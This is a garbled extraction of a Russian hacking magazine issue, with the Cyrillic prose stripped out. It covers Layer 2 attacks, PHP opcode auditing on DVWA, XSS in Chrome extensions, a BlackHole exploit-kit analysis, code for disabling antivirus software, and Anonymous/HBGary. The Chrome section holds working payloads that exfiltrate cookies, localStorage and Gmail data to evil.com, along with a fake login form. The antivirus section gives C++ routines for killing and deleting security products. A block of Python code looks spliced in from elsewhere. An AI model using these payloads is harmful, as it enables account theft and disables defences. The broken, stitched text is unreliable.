RUN. IP- ? ,
WireShark.
VLAN 10,
, .
(, SW0, . ) -
,
, trunk Cisco.
D Cisco,
D-Link, D STP.

, DTP ,
,
xDSL FTTP,
STP D-Link
VLAN. STP
. ,

IP- WireShark

_Forge Cisco D Packets

Forge Spanning-Tree BPDUs


,
,
. ,
,

.
,
( ) STP
, c.
, ,
,
(, SW0 SW1 SW0 R1, . ).
BPDU metasploit-
Forge Spanning-Tree BPDUs,
.
SW0 SW1 ( SW0 R1) , . ,
? Ethernet-,

,
ADSL-, .
, D
( ip), RUN, Metasploit .
MAC- .
, ! , , ,
, Windows XP,
: support.microsoft.com/kb/315236.
SW0 R1,
, WireShark.
R1,



.
, VLAN ,
.
Windows XP,
Cisco (
) , NM-16ESW.
,
Cisco,
.
, , 1 /, 100
/.
. , - , .

,
, , , .
, -
, . ,
,
, , . z



A X 330 D

(ax330d@gmail.com)

PHP-


-
, PHP. ,
!
. ,
,
,
PHP.

, , , ,
, ,
. - ,
.

-? . , ,

, , RIPS...
, ,

WinMerge. , , , -


?
, .
, ,
.
. , ,
, .
,
. ,
, -, PHP. - Zend,
PHP, . PHP, hello, world? ,
.

, Zend
Engine . , ,
PHP Extending and Embedding
PHP, ,
. - Advanced PHP Programming, ,
, . - PHP,
...
, PHP .
, , , ,
PHP. ,
.
, .
,
. PHP,
.
Zend Engine, : ,
. PHP mysql,
zlib, curl . SAPI
API, CLI, mod_php, fastcgi.
, ,
PHP.
,
, , . ,

, ,
. -. ,
. -
(op_array) zend_execute().
,
, .

JMP, CALL, SWITCH.
, ,
-.
,
. , APC, ,
, .
-. -,
,
Zend.

op_array.
, , , .
, , ,
_zend_op.
Zend/zend_compile.h

HTTP://WWW
links


PHP-

1. bytekit:
bytekit.org;
2. vld:
pecl.php.net/package/vld;
3.
evalhook:
goo.gl/UVq6y;
4. PHP:
php.net/manual/en/
internals2.php;
5.
Stefan Esser
PHP:
goo.gl/PtWdE;
6. DVWA: dvwa.co.uk.

:
struct _zend_op {
opcode_handler_t handler;
znode result;
znode op1;
znode op2;
ulong extended_value;
uint lineno;
zend_uchar opcode;
};

op1 op2,
, :
VAR ( $);
TMP , , ( ~);
CV , VAR ( !);
CONST , ,
;
UNUSED ;
result,
, VAR, TMP, CV.
,
0 153 (PHP 5.3.6), Zend/
zend_vm_opcodes.h.
, 116 131 .
, PHP
.
4 ,
5.1. . ,
5.1,
CV,
25 . ,
,
.
!n , ,

DVD
dvd

evalhook
.


vld
PHP $var.
, , (, html), PHP, :
<?php
$var = 1;
?>
<html>
...

PHP ECHO.
, ,
. , PHP .
, , echo(). ,
.

bytekit.
,
PHP 5.2.*. .
PHP 5.3. .
, PHP, 384 ,
(, scan_eval.php)
. , , ,

, , . , , . .
PHP Vulcan Logic Dumper (vld) bytekit. , , .


:
phpize
./configure
make
make install

php.ini, :
extension=bytekit.so
extension=vld.so

, -d
extension=bytekit.so PHP. ,
.
,
bytekit ( bytedis) .

,
( *.dot)
Zynamics
BinNavi ( php2sql). ,
-
parsekit, , ,
segfault, . bytekit
, Zend Guard, ionCube.
,
, .
,

. ,
.
( )

PHP-
evalhook. ,
eval()
preg_replace() with the /e modifier, create_function(), assert().

, evalhook
, , , ,
.
zend_compile_string(), ,
. evalhook
Month Of PHP Bugs (
web).
evalhook ,
.
, - ,
.

.
, ,
- . ,
.
, :).

.
DVWA 1.0.7
, , SQL-
FI.
XDebug, .
dot,
. bytekit
, .
,
. examples,
:
php php2dot_simple.php /var/www/htdocs/h/dvwa/vulnerabilities/sqli/source/low.php sqli-l

,
, . *.dot *.svg-. *.svg, *.dot
*.png :
dot -Tpng -o ./xxx.png xxx.dot

, .


p
q
. ,
, . n.
? ,
-
PHP, . , ,
.
vld:
php -d extension=vld.so -dvld.active=1 /var/www/dvwa/vulnerabilities/sqli/source/low.php

,
.
. , ,
main() C,
.
, SQL-.
? :
SQL- 9, 6.
~5 , ,
,
!0. ,
39, . ASSIGN
9 !1
~5. !0. ,
. o.

'Submit' $_GET, JMPZ
48 , 0, , .
, RETURN 1.
7 ,
-
$_GET. FETCH_R $2,
FETCH_DIM_R 'id'
$3. *_R read.
*_W write, , *_RW read/write,


. , ,
$3 ( PHP) !0. . SEND_VAR
,
, !1.
. , DO_FCALL mysql_query()
$7.
, ,
, -
.
, -
, . JMPNZ_EX. ?
xor ~9 $8.
, 0,
19 ( vld). ,
p.
. , ,
FREE ,
. ,
.
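To make the _zend_op operand notation and the low.php walkthrough above concrete, here is an added example; it is not the article's code and not vld or bytekit output. It models oplines as tuples carrying the handler/op1/op2/result fields of the struct, uses the $ / ~ / ! prefixes for VAR / TMP / CV operands and quoted strings for CONST (None for UNUSED), and propagates taint from a FETCH_R of $_GET through FETCH_DIM_R, CONCAT and ASSIGN to the DO_FCALL and INCLUDE_OR_EVAL sinks the text names. The opline list mirrors the low.php sequence discussed above but is constructed and simplified; the sink function names other than mysql_query are assumptions.

```python
from collections import namedtuple

# One simplified opline: the fields a reader of struct _zend_op cares about
# (handler as opcode name, op1, op2, result). Constructed, not vld output.
Op = namedtuple("Op", "line opcode op1 op2 result")

# Constructed opline list modelled on DVWA sqli/low.php: $id = $_GET['id'] -> mysql_query(),
# plus an include of $_GET['page'] (the FI case) and a constant echo as a negative case.
SAMPLE_OPS = [
    Op(5,  "FETCH_R",         "'_GET'",          None,     "$2"),  # read superglobal $_GET
    Op(5,  "FETCH_DIM_R",     "$2",              "'id'",   "$3"),  # $_GET['id']
    Op(5,  "ASSIGN",          "!0",              "$3",     None),  # $id = ...
    Op(7,  "CONCAT",          "'SELECT ... = '", "!0",     "~5"),  # build the query string
    Op(7,  "ASSIGN",          "!1",              "~5",     None),  # $getid = ...
    Op(9,  "SEND_VAR",        "!1",              None,     None),  # argument of the call
    Op(9,  "DO_FCALL",        "'mysql_query'",   None,     "$7"),  # SQL sink
    Op(12, "FETCH_R",         "'_GET'",          None,     "$8"),
    Op(12, "FETCH_DIM_R",     "$8",              "'page'", "$9"),
    Op(12, "INCLUDE_OR_EVAL", "$9",              None,     None),  # file-inclusion sink
    Op(14, "ECHO",            "'static text'",   None,     None),  # constant operand: clean
]

SOURCES = {"'_GET'", "'_POST'", "'_REQUEST'", "'_COOKIE'"}          # request superglobals
SINK_FUNCS = {"'mysql_query'", "'system'", "'exec'", "'eval'"}      # assumed list of dangerous callees

def is_operand(x):
    """True for VAR ($n), TMP (~n) and CV (!n) operands; False for CONST/UNUSED."""
    return x is not None and x[0] in "$~!"

def find_tainted_sinks(ops):
    """Forward taint pass over oplines; returns [(line, opcode, detail)] for sinks fed by request data."""
    tainted = set()       # operands currently carrying user-controlled data
    pending_args = []     # taint flags of SEND_VAR operands waiting for the next DO_FCALL
    hits = []
    for op in ops:
        if op.opcode == "FETCH_R" and op.op1 in SOURCES:
            tainted.add(op.result)
        elif op.opcode in ("FETCH_DIM_R", "CONCAT"):
            if op.op1 in tainted or op.op2 in tainted:
                tainted.add(op.result)
        elif op.opcode == "ASSIGN":
            # assignment overwrites the CV: it becomes tainted or clean depending on the RHS
            if op.op2 in tainted:
                tainted.add(op.op1)
            else:
                tainted.discard(op.op1)
        elif op.opcode == "SEND_VAR":
            pending_args.append(op.op1 in tainted)
        elif op.opcode in ("DO_FCALL", "DO_FCALL_BY_NAME"):
            if any(pending_args) and op.op1 in SINK_FUNCS:
                hits.append((op.line, op.opcode, op.op1))
            pending_args = []
        elif op.opcode in ("INCLUDE_OR_EVAL", "ECHO"):
            if op.op1 in tainted:
                hits.append((op.line, op.opcode, op.op1))
    return hits

if __name__ == "__main__":
    for line, opcode, detail in find_tainted_sinks(SAMPLE_OPS):
        print("line %d: %s reached by request data (%s)" % (line, opcode, detail))
```

The pass is deliberately linear, as the article suggests: it ignores JMP/JMPZ control flow and sanitising calls, so it over-reports, which is the right trade-off for a first triage of a large code base before opening the real dumps in vld.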
dvwa/
vulnerabilities/fi/index.php dvwa/vulnerabilities/fi/source/
medium.php.
. INCLUDE, REQUIRE,
. ,
REQUIRE_ONCE
, ~2.
.

. ~24 ~22 ~23.
. !1 . ,
q. , PHP
, :

$variable = 'low.php';

,
. .
, , ,
INCLUDE. , !2.
,
. ?
, ,
.
medium.php.
. ,
, !2.
!0, . ,
, ,
!0
str_replace(). . , ,
.
, index.php,
,
.
,
, ?
. DO_FCALL, DO_FCALL_
BY_NAME, INCLUDE_OR_EVAL, ECHO.
, , . ,
-, ,
,
.
, . ,
. .
? , SQL, , , ,
.
FETCH_R, FETCH_W
. ASSIGN
PHP. , ,
,
, .

, , . ,
,
IDA. PHP, ,
.
? , , , ,
. PHP,
, , .
,
. ,
:).
, PHP: bytekit

API, . examples/
FI:
php -d extension=bytekit.so bytekit-0.1.1/examples/check_include.php index.php
index.php(30): require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/fi/source/{$vulnerabilityFile}";
index.php(35): include($file);

, eval:
/var/www$ php -d extension=bytekit.so bytekit-0.1.1/examples/scan_eval.php ./
/var/www/dvwa/external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/VarParser/Native.php(17): $result = eval("\$var = $expr;");
PHP Warning: bytekit_disassemble_file(): bytekit_get_next_oplines: found throw outside of try/catch in /home/ams/Desktop/bytekit-0.1.1/examples/scan_eval.php on line 19
/var/www/dvwa/external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ConfigSchema/InterchangeBuilder.php(140): return eval('return array('. $contents .');');

, - , , grep?
, -, , , .
, , ,
PHP. ,
, ,
.
, . , , .
,
, .
, ,
. , PHP ,
, .
,
. . . ,
,
.

, !

, , .
, , ,
,
.

, . , ,
PHP, :). z



(oxdef.info)

GOOGLE
CHROME

Google Chrome
. ,
.
, .
, Chrome.
Googles
Chrome Extensions Show Security Focus (bit.ly/hvYkqO). , ,
. Chrome,
Firefox, . , ,
. -: HTML
JavaScript, HTML5 CSS.
,
(
JavaScript).
.


:
manifest.json e
: , , , ;
HTML-,
background.html, ;
: JS-,
( UserJS Greasemonkey );
: e , , -.
e zip- crx.

DOM-.
,


XSS .


.
API- ,
, , , , .
, , ,

.

XSS

( 18 368 ) Gmail Google Mail


Checker Plus (bit.ly/g5L6DT).
e ,
.
.

, .
. , ,
?
2"'><script src="http://evil.com/own.js"></script>

own.js JavaScript- :
document.body.innerHTML = "";
img = new Image();
img.src = "http://evil.com/stallowned.jpg";
document.body.appendChild(img);

, :

XSS :
! ,
Lostmon e 2010 ,
e, :). , , :
All extensions runs over his origin and no have
way to altered data from extension or get sensitive
data like, email account or password etc..

,
:). ,

XSS-.

document.cookie

API. ( )

, :
{
"name": "My extension",
...
"permissions": [
"cookies",
"*://*.google.com"
],
...
}

HTTP://WWW
links

HTML5: dev.w3.org/html5/spec/Overview.html;
: code.google.com/chrome/extensions/index.html;
hCard microformat: microformats.org/wiki/hcard.

, ,
,
:
.
XSS ,
e . :
:
chrome.cookies.getAll({}, function(cookies)
{
var dump = "COOKIES: ";
for (var i in cookies) {
dump += cookies[i].domain + ":"
+ cookies[i].name + ":"
+ cookies[i].value + " | ";
}
img = new Image();
img.src = "http://evil.com/stallowned.jpg?"
+ dump;
document.body.appendChild(img);
});

,
,
XSS. e (
)


XSS Google Mail Checker Plus


- HTML5. ,
, , 100%. ,
, e
:

XSS Google Mail Checker Plus


,
XSS -.
-, , API
. ,
XSS , .

XSS Gmail
. , . HTML/JavaScript , <IMG>,
. e
! , - ,
. ,
JavaScript-:
var dump = '';
var e = document.getElementsByTagName('a');
i=0;
while(i < e.length) {
if (e[i].className == 'openLink') {
dump += e[i].innerText + ' | ';
}
i++;
}
img = new Image();
img.src = 'http://evil.com/sniff.jpg?' + dump;
document.body.appendChild(img);

,
. e
,
(, , ), e .


var dump = ' LOCALSTORAGE: ';


for (i = 0; i < localStorage.length; i++ ) {
dump += "KEY: " + localStorage.key(i);
dump += " VALUE: " + localStorage.getItem(
localStorage.key(i)) + " | ";
}
img = new Image();
img.src = 'http://evil.com/sniff.jpg?' + dump;
document.body.appendChild(img);

,
,
API. ,
XSS- .
- !

e :
var msg = 'Please, enter account information.';
msg += '<form action="http://evil.com/login">Username: <input type=text name=user>';
msg += ' <br>Password: <input type=password name=pass><br><input type=submit></form>';
document.body.innerHTML = msg;

, .

,
JSON

JSON ,
- web 2.0
.
Chrome :
{
"name": "Extension",
"version": "1.0",
"description": "Some extension",
"icons": { "128": "icon.png" },
"permissions": ["http://example.com/"],
"browser_action": {
"default_title": "",
"default_icon": "pic.png",
"default_popup": "view.html"
}
}

Google Mail Checker Plus

Microformats extension
, JSON:
1. JavaScript eval() (, ).
Google JSON
JSON.parse.
2. ,
JSON- JavaScript hijacking (bit.ly/eQDXrv)
JSON(P),
.

-. ,
e
-. .


( ][
Greasmonkey ). URL- html- <A>, ,
.
(content script) , , JavaScript,
, ,
, .
,
API-. ,
:
chrome.* APIs ( chrome.extension);
, ;
, ;
XMLHttpRequests.
,
. ,
:
1. ,
, !
2. .
e
.

HTML- hCard.
URL , , ,
:
<div class="vcard">
<div class="fn">James Bond</div>
<div class="org">MI-6</div>
<div class="tel">604-555-1234</div>
<a class="url" href="123:<script>d = document.createElement('div');d.innerHTML='<h1>XSS</h1>';document.body.appendChild(d);</script>233">http://example.com/</a>
</div>

,
, ,
.
, ?
e? .

OAuth API- .

. , JQuery, !
$(".submithcard").click()


API , ,
.

? Google Chrome .
, (HTML, CSS
JavaScript) - , , XSS,
-.
XSS , XSS
-. Security
considerations ,
! z



(icq 884888, snipper.ru)

X-TOOLS
: Flash grabber
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Gar|k

: Charon v0.6 SE
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Rhino (project2025.com) &
v1ru$

.
bit.ly/fYIvbq.

: DIR-300 PWNER
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: TIMHOK


,

, ? Flash grabber.
:
,
. ,
.
-.
:
1. ;
2.
usb-;
3. ,
(
);
4. ,
,
;
5. ,
.
:
doc, docx,
ppt, pptx, rtf ;
(3.5 );
;

;
- ;
;
.


bit.ly/ew670z.


!
Charon.
,
v1ru$.
, Charon v0.6 SE ,
-
.
, ,
,
IP-,
- .
:

IP- , , ,
( );

-:
,
AngryIPScanner Superscanner;
- RBL;

-
;
HTTP (trans, anonim), ssl, socks4/5;
-;
GeoIP;
-



pwner
Dir-300.

, ,
2.05B03, 2.04,
2.01B1, 1.05B09, 1.05, 1.04, DIR-615 +
4.13B01 , ,
. .
pwner :
1. cmd;
2. ipconfig, IP;
3. IP,
( , IP 10.2.4.64,
10.2.4.0);
4. (, 10.2.4.255);
5. ( Dir-300, pwn
);
6. Go;
7. , .


.
IP .

admin
( ). .

:). , : bit.ly/gJEL38.

: Sharecash Survey
Helper
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: TickTack


Sharecash Survey Helper ,
. ,
- .

, .
: First name, Last
name, Address, City, State, Zip, Email, Birthday,
Phone. ,
Zip ,


. , .NET Framework 4.0.

bash Perl.
php/html. : ,
,
IE. ,
, .
,
html-.

, .
( ,
ftp) . Shadow
iframer .

: root
(,
)
nobody ( ,
).
: -.
index-
body.
:
# ./iframe.sh
[*]Searching for perl.../usr/bin/perl
[*]Starting index finder...please
wait...search complete. Found X pages
[*]Generating iframer...complete.
Starting iframer
[*] Injecting complete, deleting temp
files...
[*] Finished

: VkAksEnter
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: IOFFE


: http://bit.ly/ePt36Y.

: Antigate Balance
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Zdes Bil Ya

: Shadow iframer[local]
: *nix
: Gh0s7


antigate.com

, , -


Zdes Bil Ya. ,


antigate.com?
?
Antigate Balance.
, Antigate Balance

antigate.com ( ).
:
;
;
;
.
:
,
.

.
Zdes Bil Ya
bit.ly/eJbNku. ,
.


,
,
.
, VkAksEnter
, , .
:
;
antigate.com;
/ (
);
/ ;
/ .
ioffe-soft.ru/?p=412. z


MALWARE

BlackHole exploit kit


PE, , -.
BlackHole exploit kit. ,
,
. ,
-.
, .
( )
( ).

. ,
, ,
. -


, . :
<html>
<head>
<script language='javascript'>
location.href = 'http://******.net/index.php?tp=98a8c9d4da3191f5';
</script>
<body>
</body>
</html>

. 1. html-, div

. 3. -. 404 , PDF Java

HTML-, location.href=.

BlackHole, .
Hiew. ? ,
<html> <body>, asd:
.asd {width:0;height:0;overflow:hidden;}

div - (-,
) . ,
,
, .
JS, , ,
<div> (. 1).
.
FireBug FireFox,
MSDN, .
, .
eval , <div>. ,
, - ,
, (v*1,22222). ,
fromCharCode,
ANSI-. ,
. eval fromCharCode
. document , innerHTML #va
{background:url(data:,ring.from4harCo)}. va eval ring.from4CharCo

. 2. ,
html-
fromCharCode. eval?
, .
eval
. :
document.write(
'<center><h1>404 Not Found</h1></center><hr>');

,
404, , , .
, .
, html , ,

.
,
.
, :
CVE-2010-1885, CVE-2010-4452, CVE-2010-3552, ADODB.Stream
CVE-2010-0188. .

CVE-2010-1885

VBS-,
ADODB.Stream, 2004 (!) .
. ,
. . ,
, :).

MSXML2.XMLHTTP, ADODB.Stream Wscript. ,
, .


MALWARE

. 4. VBS-, ADODB.Stream

CVE-2010-4452

, CVE-2010-4452. Oracle
. Java .
code codebase <applet>
. ,
, ,
. :
IP- . , http://1476066051, .

CVE-2010-3552
, ,
CVE-2010-3552. - Java Runtime Environment.
Java- launchjnlp, docbase
sprintf. , . -
kernel32 PEB:
pushad
xor ecx,ecx
mov esi,fs:[ecx][30]
mov esi,[esi][0C]
mov esi,[esi][1C]
mov ebx,[esi][08]
mov edx,[esi][20]
mov esi,[esi]
cmp [edx][18],cx
jne
mov [esp][1C],ebx
popad
retn

API- (.
. 8.). urlmon.dll
URLDownloadToFile, .

Help and Support


Center

,
OC Windows Help and
Support Center. , -

. 5. , CVE-2010-1885



. 6. JavaScript', CVE2010-1088

. 7.
<pageSet>
<pageArea id="roteYom" name="roteYom">
<contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
<medium long="792pt" short="612pt" stock="default"/>
</pageArea>
</pageSet>
<subform h="756pt" w="576pt" name="qwgwqgwqg">
<field h="65mm" name="favwwbw" w="85mm" x="53.6501mm"
y="88.6499mm">
<event activity="initialize" name="loxRote">
<script contentType="application/x-javascript">

. 8. ,
API-
,
hcp://. , ,
html, . ,
, <div> .
. , , ,
CVE-2010-1885 (. . 5).
, , hcp://
%A.
, : SaveToFile, GET,
Adodb.Stream, WshShell.Run, MSXML2.XMLHTTP .

. ,
, .

Adobe Reader
Adobe Acrobat

,
PDF-, PE, . , :
- Adobe Reader Adobe Acrobat.
PDF. XFA
JavaScript. :
<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/">
<subform layout="tb" locale="en_US" name="asfaewf">

, subform pageArea,
,
. initialize, 'event activity='.
.
, ,
. <div>
-.
Adobe,
. ,
favwwbw.rawValue ( favwwbw ) TIFF-.

, - .
(. . 7), . . UPX,
'upx d',
. , .

, ,
.
. ,
, :). z


MALWARE
RankoR (ax-soft.ru)

BEGINNERS EDITION

AVG, Trend
Micro Microsoft Security Essentials

- . ,
. ?
?

,
, . ,
:
Trend Micro - .
2007 .
AVG Internet Security 2011 ( )
, .


Microsoft Security Essentials .

. ,
. , () ,

AVG

.

Oracle VirtualBox Windows
XP SP3. ,
.
.
,
.
(VirtualBox Hostonly Ethernet adapter).
192.168.56.0/24.
192.168.56.102. C:\Share\
fuckAv.
IDE Visual Studio 2010, . ,
Debugging.
Debugger to launch Remote Windows Debugger;
Remote Command C:\Share\fuckAv\fuckAv.exe;
Working directory C:\Share\fuckAv;
Remote Server Name 192.168.56.102;
Connection Remote with no authentication (Native
only);
Debugger Type Native Only.

x86 ,
msvsmon.exe.

, , IDE .

( ) .
:
,
,
.
.

( ).

user-mode .
2 5
.

Epic Fail Microsoft

.
,
. ,
:
bool killProcessByPID(int PID)
{
return TerminateProcess(OpenProcess(
SYNCHRONIZE | PROCESS_TERMINATE, false, PID),
0);
}

,
SYNCHRONIZE PROCESS_TERMINATE, . ?
Microsoft
Security Essentials. , ,
, . ,
.
, :).
Trend Micro.
, , SYSTEM,
, usermode
. , ,
. , Trend Micro
.
AVG.
:
, . ,
Access Denied. .

DVD
dvd

Visual Studio
2010.

WARNING
warning
,
,

.

Service Permanently
Unavailable

, .
, ,
- . .
, .


MALWARE


Trend Micro

, , Essentials. , ,
. ?
,
:
bool stopService(const char *svcName)
{
SC_HANDLE scManager = NULL;
SC_HANDLE scService = NULL;
bool result = false;
SERVICE_STATUS ss;
scManager = OpenSCManager(NULL, NULL, GENERIC_ALL);
if ( ! scManager )
{
printf("[-] Failed to open SCManager: %d\n", GetLastError());
return false;
}
scService = OpenService(scManager, svcName, GENERIC_ALL);
if ( ! scService )
{
printf("[-] Failed to open the service: %d\n", GetLastError());
return false;
}
result = ControlService(scService, SERVICE_CONTROL_STOP, &ss);
if ( result )
result = DeleteService(scService);
CloseServiceHandle(scService);
CloseServiceHandle(scManager);
return result;
}

, ... ? MS SE, . ,
. , . .
.
Trend Micro . ,
, .. ,
, ERROR_INVALID_SERVICE_CONTROL. : DeleteService
true, . ,
.
AVG 2 avgwd
AVGIDSAgent. , . .

File not found

,
, . , ,
. :
bool removeFolder(const char *file)
{
return MoveFileEx(file, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
}

, MoveFileEx
, , ,
MOVEFILE_DELAY_UNTIL_REBOOT ,
.
,
() ,
. ,
. MS Security Essentials
, GUI. , Trend Micro, -

.
exe,
4.
AVG
removeFolder("C:\\Program Files\\AVG\\AVG10\\avgui.exe");
GUI , /dev/null.
..
, . .

, ,
.
, .
-
,
.
n- , , :). ,
: , ,
, ?
, ,
? z

MALWARE


.
?

BCG- (
, Boston Consulting
Group). :
,
. ,
,

, , . ?
CISCO
IT-, , , . .

Web-

()

VoIP

()

DDoS-

.
.
scareware
( ), ( ),
. ,
.

.
,

.
/
-,
,
, , .

.

.
. :
,
,

, DDoS-. ,
-
, .

.
,
,
(
),
( ).
CISCO
VoIP ,
, , . z



Mifrill (mifrill@real.xakep.ru)



. WIKILEAKS, THE PIRATE BAY, ,
, . ,
.
,

. .
. . .

Anonymous ( .,
), , ,

. , ,
-
Anonymous. ,
, -, . ,
, , ,
, ,

.
?
2003 ,
Anonymous
( !) ,
2ch 4chan,
Encyclopedia Dramatica,
( , ) .
.


. ,

,
,


, .


.
,
, , , , ... -,
, ,
:). , . , .


The Pirate Bay

,
Anonymous
. -
, , .

. ,
, , . ,
, , 75 000 000

.
,
, ,
.
( , )

.

,
.
.
, 2008 YouTube


(, , YouTube ),
-
.
, ,
,

.
, , ,
YouTube,
.


YouTube .
(Project Chanology),
DDoS- ,

,
YouTube.
.




,
-

. ,
. ,
C , .
: , .
,
. ,
,
. . . . . .
..
YouTube .

,
93- ,
, , , , , .

V / V . , , . V
, -,

I 1605 . ,
,

, .
.
( )
. , .
2009 ,
The Pirate
Bay. (,



), Bailout.
,

, .
17 ,
.
,
MAQS,
. 20 ,
,
DDoS-
ifpi.org, ifpi.com, ifpi.se maqs.com.
,
MPAA (
) MAQS,
,
. , ,
.

700 1000 .

IRC- (,
IRC, Twitter): irc.anonnet.org #tpb,
irc.raidchan.org #seedsofliberty, irc.anonnet.
org #888chan, irc.freenode.net #fuckifpi.
(
) LOIC
(Low Orbit Ion Cannon) , C# 4Chan.
, -
. TCP-,
UDP- HTTP- ,
. ,
,
. LOIC
,
.

( )
,

Twitter


Anonymous
HBGary

V V

,
.

Wikileaks HBGary

, ,

.
, , ,
. ,
Anonymous -
, .
YouTube,
Tumblr .

.

Wikileaks .
,
- :

,

(Moneybookers, Visa, Mastercard, PayPal),
,
.
-,
,
.
,
.
2010 ,
: 8 10
LOIC 30 000 , ,


50 000. .
Payback
( .),
DDoS.
,
,
web-

,
. PayPal,
- . ,
:
,
, . DDoS .
. ,
IRC-.
DDoS:
MyFax.com
FaxZero.com.
Tor -.
Anonymous Wikileaks.

RSA 2011
( ),
, HBGary

, , ,
.


,
,
. ,
,
,
.

, , ,
.
, ,
, .
,
,
,
- .
, .
- DDoS,
-
:). ( )
,
.

HBGary Federal, .
- , .
HBGary
IT : , ,
, ,
,
. HBGary Federal
,
.
, -
.
,
- - DDoS

,
.
Anonymous . .
, , , ,
LOIC
,
.
,
,
.

, .


, 20- .

DDoS-

.

?, . : . ,
,
.
,
, !
post factum ,
,
, , .
, .

, , .
(Goodspeak,
CogAnon) IRC-
,
.
,
,
, - .
, .
Facebook Twitter,
Google, . -
, ,
.
...

Financial Times,
, 45
Anonymous,
,
. , :
, , ,
. 30
10
.
-,
Q .
-
.

Financial Times,
anonnews.org
:
9000
- IRC-, ,

,
.
,

.
,
HBGary, , , .
,


: Keylogger 12
Monkeys. $60 000,
$240 000. ,
, HBGary
0day-, ,
. .

-
, .
. ,
.
DDoS .
Anonymous
,
.
DDoS-
hbgaryfederal.com. ,
,
.


,
. , , .
... hbgaryfederal.com SQL-.
CMS , . ,
: hbgaryfederal.com/pages.
php?pageNav=2&page=27.
,
, HBGary MD5 ,
, .

.
- ,
.
hbgaryfederal.com, Twitter, Facebook
LinkedIn , , hbgary.com rootkit.org, .
, ,
, 60
000 , , .
, iPad
:).


,
, ][
: www.xakep.ru/post/54902.
, , ,
.

.
,
.
:
. , ?
. ,
,
IRC. ,
, ?
!.
,
,
.
,
, , ,
. ,
,
.
, ,
. ,
TPB: thepiratebay.org/
torrent/6156166/HBGary_leaked_email.
, HBGary
. ,
,
(Palantir
Berico Technologies), Wikileaks.
,
WikiLeaks, , .
WikiLeaks . ,
, ,
.
, , , HBGary


HBGary
Federal,
.
, IT
,
. , .

,
.
HBGary, McAfee, ,
. - ,
: .
Anonymous, ,
.
: www.
facebook.com/anonleaks. ,
. -

Forbes, 16-
,
HBGary. ,
,
, ,
e-mail,
microSD-.
HBGary
, Sony,
,

.
PlayStation
Network ,
- , ...
, ,
,
PSN
.
70 000 000 !
, , ,

. ,
, , .
. z

UNIXOID
(execbit.ru)

[Figure: CoLinux address-space layout: Guest Linux on top, the intermediate layer at 0xFFFFFFFF, Host OS at 0x80000000]

... . , ,
, . - - .
.

IT.
,
. , , ,


, .
FreeBSD Solaris
:
FreeBSD Jail Solaris Zones.
, qemu
FreeBSD VirtualBox Solaris (

[Figure: SPICE architecture. QEMU VM: guest (vdagent, qxl driver, standard guest drivers), vmc / virtio-serial, devices QXL (cirrus), keyboard / mouse / tablet, AC97 / ES1370, nic, printer; spice server channels: main, display, cursor, inputs, record / playback, tunnel; spice client on the user's machine]

LXC

DVD

, .
/etc/fstab:
cgroup /var/cgroup cgroup defaults 0 0

CoLinux

/etc/network/interfaces (
Debian/Ubuntu- ):
auto br0
iface br0 inet dhcp
bridge_ports eth0
bridge_fd 0
qemu). Linux . qemu-kvm, KVM,


,
,
Linux-VServer OpenVZ. ,
:
, , Linux, ,
(
, ).
LXC,

. LXC (LinuX Containers)
Linux-VServer OpenVZ,


, ,
,
(namespaces)
(cgroups),
Linux-. Linux namespaces

-.
,
, ( chroot),
, IPC . , ,
,

.

cgroups,
( ,
, ).

, cgroups
(
, , ,


qemu
SPICE

Fedora 14 RHEL6,


Red Hat Enterprise
Virtualization for
Desktops.

HTTP://WWW
links

SPICE:
spice-space.org;
LXC: lxc.sf.net;
CoLinux: colinux.
org;
AndLinux: andlinux.
org.


UNIXOID

getty ( root:root).
-
,
/var/lib/lxc//rootfs, /var/lib/
lxc//config. , LXC , , (
cgroups ),
.

CoLinux Windows
libcgroups). , ,
LXC,
namespaces cgroups.
. LXC .
, Ubuntu,
(
LXC, ):
1. LXC :
$ sudo apt-get install lxc bridge-utils

2. , , LXC ( , LXC ,
):
$ sudo lxc-checkconfig

3. cgroups :
$ sudo mkdir /var/cgroup
$ sudo mount -t cgroup cgroup /var/cgroup

4. ,
(-
):
$ sudo brctl addbr br0

5. Ubuntu ( ) (LXC "",


/usr/lib/lxc/templates,
, ,
):
$ sudo apt-get install debootstrap
$ sudo lxc-create -n ubuntu -t ubuntu \
-f /usr/share/doc/lxc/examples/lxc-veth.conf

'-t' , '-f' .
6. :
$ sudo lxc-start -d -n ubuntu
$ sudo lxc-info -n ubuntu

sudo lxc-console -n ubuntu.


,
, ,
.

, ,
.
, .
web-,
- : gmail, rss- google reader,
google docs web
2.0. , . , web-,
,
.
Photoshop, 3D Max
, , Crysis.
, Windows Linux,
,
.
: Remote Desktop
. , Photoshop 3D Max,
, ,
. ,
.
SPICE (Simple Protocol for Independent Computing
Environment
), Red Hat 2009 ,
.
SPICE ,
- ,
, .
SPICE , , .
,
( SPICE- ).
QXL,
.
,
QXL- ( VGA-), SPICE-,
. ,
, QXL
, , -,
, -,
. ,
QXL-
,
,

LXC
SPICE ,
qemu,
, :
1. qemu '-spice':

lxc-checkconfig , LXC
(
QXL- );
,
(QUIC, Lempel-Ziv, Global LZ),
; M-JPEG
.
SPICE , . ,
QXL . ,
.
QXL-,
.
.

.
SPICE ,
QXL.
,
- ,
.
SPICE
. , , ,
, ,
. , .
QXL, , .
: (,
QXL).
SPICE-
. , SPICE
,
.
. , , , (, ,
WiMAX-), SPICE QXL-
, ( ,
). .

$ qemu-kvm -spice port=1234,disable-ticketing -hda ///

2. SPICE- (
spice-client), :
$ spicec -h localhost -p 1234

,
'disable-ticketing' 'password='.

Linux

, , Windows Linux,
.
- , ,
. ,
, .

, .
,
. , ,
Windows , MS Office, . Wine,
-

Windows .
Wine , , ,
Windows. Cooperative Linux ( CoLinux)
. Wine
.
Wine, , Win32 Linux
, , CoLinux
Linux,
( , ,
).
CoLinux , Windows-. ,
Windows. ( , , ) CoLinux


UNIXOID

LXC-
( Windows).
Windows-
. CoLinux conet,
Windows ,
. cocon Linux,
Windows, Windows-,
